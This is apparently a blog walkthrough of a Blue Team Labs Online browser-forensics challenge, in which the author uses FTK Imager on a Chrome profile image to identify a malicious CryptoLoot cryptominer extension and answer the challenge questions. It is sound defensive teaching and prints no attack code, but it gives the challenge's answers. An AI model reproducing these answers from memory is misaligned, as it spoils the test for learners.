Blue Team Labs Online — Browser Forensics — Cryptominer Walkthrough
An incident response challenge using FTK Imager and the Google Chrome browser cache.
Introduction:
Welcome to my weekly walkthrough! If you’ve stumbled across this blog searching for a comprehensive walkthrough of the Browser Forensics -Cryptominer challenge from Blue Team Labs Online, you’re in the right place.
In this incident response scenario, we’re handed a forensic image of a victim’s device suspected to be infected with crypto mining malware, and it’s up to us to uncover more details about the activity. Our objective is to analyze the local Google Chrome browser cache to identity the miner, determine if it’s malicious, and understand how it operates.
To perform the analysis, we’re going to leverage FTK Imager to explore the device image. Then, we’ll examine the Google Chrome cache and enrich our findings with some external research to learn more about the crypto miner. Sounds like fun, right? Let’s get into it!
And if you find this walkthrough helpful — whether it levels-up your skills, gets you over a stumbling block, or serves as a handy reference — please give it a clap and consider following me for more content like this.
Thanks for reading and going on this investigation with me!
Challenge Link: https://blueteamlabs.online/home/challenge/browser-forensics-cryptominer-aa00f593cb
Challenge Scenario:
Our SOC alerted that there is some traffic related to crypto mining from a PC that was just joined to the network. The incident response team acted immediately, observed that the traffic is originating from browser applications. After collecting all key browser data using FTK Imager, it is your job to use the ad1 file to investigate the crypto mining activity.
Setup the Analysis Environment & Extract the challenge file:
Safety first! It’s always important when working with lab/challenge files from Blue Team Labs Online (or any educational lab/challenge/range) to keep yourself protected by performing these tasks in a dedicated, isolated virtual machine environment. For example, I’m using FLARE-VM for this challenge and walkthrough.
To keep this write-up focused I’m going to skip the step-by-step setup of FLARE-VM but if you’d like to set up your own environment, please follow the directions provided directly by FLARE-VM on GitHub.
Okay! Once we have our virtual environment created, updated, isolated, and snapshotted, we can extract the challenge file and start our investigation!
Question 1: How many browser-profiles are present in Google Chrome?
Let’s kick off this challenge by extracting the challenge file, TUJTWfM5uUCHWUHzC5cfEDVYZqw9tYSgS53jWRKc with the provided password. Inside, we’ll find a folder containing BrowserData.zip — Go ahead and extract that one, too.
This will give us the challenge file browserdata.ad1, a disk image file created by FTK Imager. If you aren’t familiar with it, FTK imager is a forensic hard disk imaging tool. For this challenge, we’ll use it to mount the evidence/challenge file so that we can analyze the file system within the image, search the user’s Chrome history, and even extract artifacts from the image.
To start, launch FTK Imager and load the file by pressing File > Add Evidence Item > Image File > Select the extracted Challenge File (browserdata.ad1).
Now that we have mounted the image, we can expand the evidence tree and browse the disk artifacts.
Since the alert pointed to a browser-based attack, we need to navigate to the file path for the Google Chrome Browser data. You might be asking yourself, “where do I find that?” — great question! I’ll point to a handy resource from Foxton Forensics, Browser History Examiner — User Guide which can help point us in the right direction:
Location of Google Chrome history
Windows
C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default
C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\Cache
Back in FTK, navigate to that file path:
To answer Question 1, we’ll need to determine the location of the user profiles to analyze how many are present. Chrome profiles are stored in the user’s AppData > Local > User Data folder. Besides the default profile, additional profiles will be named "Profile #".
Based on the evidence, there are two profiles: Default and Profile 1.
Question 2: What is the name of the browser theme installed on Google Chrome?
To answer Question 2, we’re searching for a browser theme. Let’s refer back to the Foxton Forensics guide where we’ll discover that user’s browser settings are stored in the Preferences JSON file.
Let’s check it out and leverage the “find” function to search for “theme.”
Preferences file for Google ChromeThis search leads us to a browser extension ID number. To get more information, let’s locate this extension in the Extensions folder by matching the string that we found in Preferences. Once inside of the corresponding Extensions folder, we need to find the theme’s name. This information might be found in the messages.json within the locales folder of the extension.
But first, let’s get some background on what the messages.json is from Google:
Each internationalized extension has at least one file named
messages.jsonthat provides locale-specific strings.
In other words, this file is used for translation and localization for different languages, including locale-specific strings. Maybe there is a helpful string here for us to discover the extension name? Let’s open messages.json to find out!
messages.json fileBingo! Inside of the file, we’ll see that the message string displays the name “Earth in Space.”
Question 3: Identify the Extension ID and Extension Name of the cryptominer
Now that we’ve identified the theme extension, let’s turn our focus to scanning through the rest of the installed extensions looking for the cryptominer. To do this, we’ll review the manifest.json file for suspicious entries in each of the extension folders. But what is the manifest file, anyway? According to Google:
Every extension must have a
manifest.jsonfile in its root directory that lists important information about the structure and behavior of that extension. This page explains the structure of extension manifests and the features they can include.
With that in mind, we can check the files starting from the first extension and moving our way down the list. Eventually, we’ll stumble on the below extension:
egnfmleidkolminhjlkaomjefheafbbb
This one looks a bit suspicious. To confirm that this is the extension we’re looking for to answer Question 3, let’s pivot and gather some external intelligence about this extension ID on Chrome-Stats.
Our search provides us some valuable data and confirms that the extension is considered “very high risk” and was actually removed from the Chrome Web Store due to malware. This confirms our finding.
Question 4: What is the description text of this extension?
Fortunately, we’ve already discovered the answer to Question 4 in the manifest.json file under the “description” tag. Additionally, we can also find it listed on the Chrome-Stats page.
Question 5: What is the name of the specific javascript web miner used in the browser extension?
To answer Question 5, we’re going to refer back to the manifest.json. At the top of the file, in the “background” key of the manifest, notice the referenced script, background.js.
Let’s extract the JavaScript and examine it more closely. To extract the file from the image, locate the script in FTK’s file list, right-click it, and select “Export Files…”
Once the file is exported, open it in Notepad++ or another text editor to view the script details. To answer Question 5, focus on lines 1 and 3, where we can determine that this script enables the CryptoLoot miner.
Question 6: How many hashes is the crypto miner calculating per second?
Continuing with our analysis of the miner in Notepad++, we can find a hashesPerSecond variable on line 17 with a value of 20.
Question 7: What is the public key associated with this mining activity?
Circling back to the variable on line 3, we’ll find the miner’s public key.
Question 8: What is the URL of the official Twitter page of the javascript web miner?
We’ve made it to the last question! To complete our investigation, we need to locate the official Twitter page for the Crypto Loot miner. All we need to do is perform a quick Google search.
Keep in mind, since this challenge was originally published, Twitter was rebranded to X, so the results might look a little different. But we can follow the answer format and use the Twitter domain instead. Go ahead and submit the answer, and let’s wrap up this challenge!
Conclusion:
Mission accomplished! Using FTK Imager, we explored a forensic image of the infected device, focusing on the Google Chrome cache. From the cache, we identified a crypto mining extension that we determined was malicious using Chrome-Stats. After that, we looked at the miner’s JavaScript functions to understand how it works. Now that we have analyzed the miner, and completed our objectives, let’s close out this walkthrough of Browser Forensics -Cryptominer with a big thank you to Blue Team Labs Online, for the fun and engaging challenge!
Thanks for your support and going through this investigation with me. Remember, if you found this walkthrough helpful don’t forget to give it a clap! Your feedback really is invaluable and helps fuel my commitment to support your journey in the security community. Cybersecurity is a team sport and we’re in this together!
Until next week’s challenge — stay curious and be safe out there!
Tools & References:
FTK Imager: https://www.exterro.com/digital-forensics-software/ftk-imager
Foxtron Forensics — Browser History Examiner — User Guide: https://www.foxtonforensics.com/browser-history-examiner/chrome-history-location
Chrome for Develops — Manifest file format: https://developer.chrome.com/docs/extensions/reference/manifest
Chrome-Stats: https://chrome-stats.com/
